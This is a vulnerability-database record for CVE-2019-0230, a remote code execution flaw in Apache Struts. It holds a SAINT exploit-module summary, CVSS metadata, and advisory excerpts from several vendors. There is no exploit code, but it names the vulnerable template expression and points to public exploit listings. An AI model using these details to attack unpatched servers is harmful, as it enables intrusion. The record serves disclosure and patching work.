Apache Struts double OGNL evaluation

2020-11-27T00:00:00

Description

Added: 11/27/2020 CVE: [CVE-2019-0230](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0230>) ### Background Apache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. Struts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. ### Problem Apache Struts can be forced to use double OGNL evaluation, which could allow a remote attacker to execute arbitrary code by sending a specially crafted request. ### Resolution [Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.5.22 or higher. ### References <https://cwiki.apache.org/confluence/display/ww/s2-059> ### Limitations curl must be installed on the target for this exploit to succeed. ### Platforms Linux

{"id": "SAINT:AE1DA80E6B0E4C12B5D781794166897B", "vendorId": null, "type": "saint", "bulletinFamily": "exploit", "title": "Apache Struts double OGNL evaluation", "description": "Added: 11/27/2020 \nCVE: [CVE-2019-0230](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0230>) \n\n\n### Background\n\nApache Struts is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API to encourage developers to adopt a model-view-controller (MVC) architecture. \n\nStruts uses Object-Graph Navigation Language (OGNL) to provide extensive expression evaluation capabilities. \n\n### Problem\n\nApache Struts can be forced to use double OGNL evaluation, which could allow a remote attacker to execute arbitrary code by sending a specially crafted request. \n\n### Resolution\n\n[Upgrade](<http://struts.apache.org/download.cgi#struts23151>) to Struts 2.5.22 or higher. \n\n### References\n\n<https://cwiki.apache.org/confluence/display/ww/s2-059> \n\n\n### Limitations\n\ncurl must be installed on the target for this exploit to succeed. \n\n### Platforms\n\nLinux \n \n\n", "published": "2020-11-27T00:00:00", "modified": "2020-11-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/struts_double_ognl", "reporter": "SAINT Corporation", "references": [], "cvelist": ["CVE-2019-0230"], "immutableFields": [], "lastseen": "2021-07-28T14:33:35", "viewCount": 562, "enchantments": {"dependencies": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-60189", "ATLASSIAN:CONFSERVER-60264", "CONFSERVER-60264"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:CF76EF1F-CB59-4A29-ADB1-DA37C695142B"]}, {"type": "cisa", "idList": ["CISA:3D9E69A26C68866B64ED6E4B31E270E6"]}, {"type": "cve", "idList": ["CVE-2019-0230"]}, {"type": "exploitdb", "idList": ["EDB-ID:49068"]}, {"type": "f5", "idList": ["F5:K24608264"]}, {"type": "github", "idList": ["GHSA-WP4H-PVGW-5727"]}, {"type": "githubexploit", "idList": ["453574C2-C801-529D-A0A6-5C5E1471F1AC", "4E339DB6-4704-5991-B690-DF8D7307532E", "5E7409E5-7716-5F40-999C-E6622B806F5E", "B1E738E0-BF1B-50E1-88E2-1D265CF9AEB8", "BD05B538-25EA-5C42-AE8D-229D78B57CB1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20200902-01-STRUTS2"]}, {"type": "ibm", "idList": ["20DAAA2A40C4A633F7230B8255F0CADBA6E88A77DD305EC21132BECBFF011089", "3477DD0939B4B8CC59240F8DCC09305A2F7C13CA45285602F1755CDF6F593B52", "35DB525D4E07A09A6F2976ED4B93F380507E2F51F096B5749BE6E096C57DD8BD", "43ABDDEF8A51FB28FC8C4825BAD26A0A25F5F21805BFC87561A0AEABFD065F37", "461BBFF276D2BD07EE935B18691B56E01933360B1B42DAE8AAFFC1167BCA5486", "60BC7D4DCC3D358CA3A091D2D1C15EE5A67539C2664E72739BD35D6406A88E4A", "87B4000A01C23B6231C463A8E1B3BEC371361C202F46354684899DC113F12BC8", "9235ED396A90BB944C2B22072DE6B91B22155C3982DDD732067344CA700C0ADE", "C22DE952FD6E1544B14AE2735F81ACAE3EF08509FC895F0AAF0AC7485A98F798", "C6AE70E5471CDF678253E267AB7C45FA772A777F24502EE50E243BD88E300D13"]}, {"type": "kitploit", "idList": ["KITPLOIT:5420210148456420402"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-STRUTS2_MULTI_EVAL_OGNL-"]}, {"type": "nessus", "idList": ["STRUTS_2_5_22.NASL", "WEB_APPLICATION_SCANNING_112766"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2021", "ORACLE:CPUJAN2021", "ORACLE:CPUOCT2021"]}, {"type": "osv", "idList": ["OSV:GHSA-WP4H-PVGW-5727"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160108", "PACKETSTORM:160721"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5482AC1594C82A230828023816657B57"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-0230"]}, {"type": "saint", "idList": ["SAINT:1126B0AA9A8BD987E404F1746F1D8BFA", "SAINT:891A42933A0DE986694E3B7D51B3F2F1"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}, {"type": "threatpost", "idList": ["THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-0230"]}, {"type": "veracode", "idList": ["VERACODE:26331"]}, {"type": "zdt", "idList": ["1337DAY-ID-35263", "1337DAY-ID-35571"]}]}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-60189"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36"]}, {"type": "cisa", "idList": ["CISA:3D9E69A26C68866B64ED6E4B31E270E6"]}, {"type": "cve", "idList": ["CVE-2019-0230"]}, {"type": "exploitdb", "idList": ["EDB-ID:49068"]}, {"type": "github", "idList": ["GHSA-WP4H-PVGW-5727"]}, {"type": "githubexploit", "idList": ["453574C2-C801-529D-A0A6-5C5E1471F1AC", "4E339DB6-4704-5991-B690-DF8D7307532E", "5E7409E5-7716-5F40-999C-E6622B806F5E", "B1E738E0-BF1B-50E1-88E2-1D265CF9AEB8", "BD05B538-25EA-5C42-AE8D-229D78B57CB1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20200902-01-STRUTS2"]}, {"type": "ibm", "idList": ["35DB525D4E07A09A6F2976ED4B93F380507E2F51F096B5749BE6E096C57DD8BD"]}, {"type": "kitploit", "idList": ["KITPLOIT:5420210148456420402"]}, {"type": "nessus", "idList": ["STRUTS_2_5_22.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2021"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160108"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5482AC1594C82A230828023816657B57"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-0230"]}, {"type": "saint", "idList": ["SAINT:1126B0AA9A8BD987E404F1746F1D8BFA"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}, {"type": "threatpost", "idList": ["THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-0230"]}, {"type": "zdt", "idList": ["1337DAY-ID-35263", "1337DAY-ID-35571"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2019-0230", "epss": "0.856390000", "percentile": "0.979350000", "modified": "2023-03-16"}], "vulnersScore": 0.3}, "_state": {"dependencies": 1678920471, "score": 1698841580, "epss": 1679050336}, "_internal": {"score_hash": "ea165d648893768255c021ff7590a0a3"}}

{"prion": [{"lastseen": "2023-11-22T01:50:54", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-09-14T17:15:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2022-12-02T19:47:00", "id": "PRION:CVE-2019-0230", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2019-0230", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2023-04-18T11:29:42", "description": "struts2-core is vulnerable to remote code execution (RCE). The vulnerability exists through the possibility of a forced double OGNL expression through the `${itemValue}` expression in `simple/radiomap.ftl`.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-14T01:35:22", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2022-12-02T21:18:00", "id": "VERACODE:26331", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-26331/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-08-01T05:29:19", "description": "## What's this\r\nThis is a Simple test Project for S2-059 which c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-11T03:40:04", "type": "githubexploit", "title": "Exploit for Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2022-08-01T02:16:43", "id": "4E339DB6-4704-5991-B690-DF8D7307532E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:13:19", "description": "CVE-2019-0230\nCVE-2019-0230 Exploit\n\nThis is CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-13T13:31:52", "type": "githubexploit", "title": "Exploit for Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2021-03-14T04:43:03", "id": "B1E738E0-BF1B-50E1-88E2-1D265CF9AEB8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:10:04", "description": "# CVE-2019-0230_Struts2S2-059\n\n## How to use\n\n### Build Struts25...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-11T18:57:14", "type": "githubexploit", "title": "Exploit for Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2021-08-27T17:41:18", "id": "453574C2-C801-529D-A0A6-5C5E1471F1AC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:05:07", "description": "# CVE-2019-0230\nCVE-2019-0230 Exploit\n\nThis is CVE-2019-0...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-13T13:05:36", "type": "githubexploit", "title": "Exploit for Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2021-12-29T12:51:47", "id": "5E7409E5-7716-5F40-999C-E6622B806F5E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:04:36", "description": "# CVE-2019-0230\nCVE-2019-0230 Exploit\n\nThis is CVE-2019-0...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-22T17:55:10", "type": "githubexploit", "title": "Exploit for Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2021-10-25T12:46:45", "id": "BD05B538-25EA-5C42-AE8D-229D78B57CB1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "osv": [{"lastseen": "2023-03-28T05:08:41", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-02T14:50:51", "type": "osv", "title": "Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2023-03-28T05:08:35", "id": "OSV:GHSA-WP4H-PVGW-5727", "href": "https://osv.dev/vulnerability/GHSA-wp4h-pvgw-5727", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "huawei": [{"lastseen": "2023-12-07T20:15:05", "description": "The Apache Struts frameworks, when forced, performs double evaluation of attributes' values assigned to certain tags attributes such as id so it is possible to pass in a value that will be evaluated again when a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code Execution. The problem only applies when forcing OGNL evaluation inside a Struts tag attribute, when the expression to evaluate references raw, unvalidated input that an attacker is able to directly modify by crafting a corresponding request. (Vulnerability ID: HWPSIRT-2020-49789)\n\nThis vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2019-0230.\n\nHuawei has released software updates to fix this vulnerability. This advisory is available at the following link:\n\n[http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200902-01-struts2-en](<http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200902-01-struts2-en>)\n\n[](<http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200610-02-phone-en>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-02T00:00:00", "type": "huawei", "title": "Security Advisory - Remote Code Execution vulnerability in Apache Struts2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2021-02-10T00:00:00", "id": "HUAWEI-SA-20200902-01-STRUTS2", "href": "https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200902-01-struts2-en", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "atlassian": [{"lastseen": "2021-07-28T14:40:37", "description": "Atlassian Confluence Server and Data Center is *not affected* by CVE-2019-0230 (Apache Struts Potential Remote Code Execution Vulnerability).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-14T01:58:06", "type": "atlassian", "title": "CVE-2019-0230 - Apache Struts Potential Remote Code Execution Vulnerability [Confluence Server is not affected]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-19T05:03:06", "id": "ATLASSIAN:CONFSERVER-60264", "href": "https://jira.atlassian.com/browse/CONFSERVER-60264", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-07T19:10:15", "description": "Atlassian Confluence Server and Data Center is *not affected* by CVE-2019-0230 (Apache Struts Potential Remote Code Execution Vulnerability).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-14T01:58:06", "type": "atlassian", "title": "CVE-2019-0230 - Apache Struts Potential Remote Code Execution Vulnerability [Confluence Server is not affected]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2023-01-30T21:21:15", "id": "CONFSERVER-60264", "href": "https://jira.atlassian.com/browse/CONFSERVER-60264", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-21T03:44:55", "description": "h3. Issue Summary\r\nRecently, Apache released the following report regarding two different vulnerabilities in Struts 2:\r\n\r\n[|https://struts.apache.org/announce.html#a20200813]\r\n\r\nIs Confluence affected by these CVEs?\r\n\r\nh3. Steps to Reproduce\r\n Not applicable.\r\n\r\nh3. Expected Results\r\n Not applicable\r\n\r\nh3. Actual Results\r\n Not applicable\r\n\r\nh3. Workaround\r\n Not applicable\r\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-18T13:48:36", "type": "atlassian", "title": "Struts 2 CVE-2019-0230 and CVE-2019-0233 impact on Confluence", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0233", "CVE-2019-0230"], "modified": "2020-08-21T00:02:20", "id": "ATLASSIAN:CONFSERVER-60189", "href": "https://jira.atlassian.com/browse/CONFSERVER-60189", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhatcve": [{"lastseen": "2023-12-07T23:42:55", "description": "A flaw was found in Apache Struts frameworks. When forced, struts2 performs double evaluation of attributes' values assigned to certain tags attributes such as ID so it is possible to pass a value that will be evaluated again when a tag's attributes will be rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). The largest threat from this vulnerability is to data confidentiality and integrity as well as system availability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-18T19:29:30", "type": "redhatcve", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 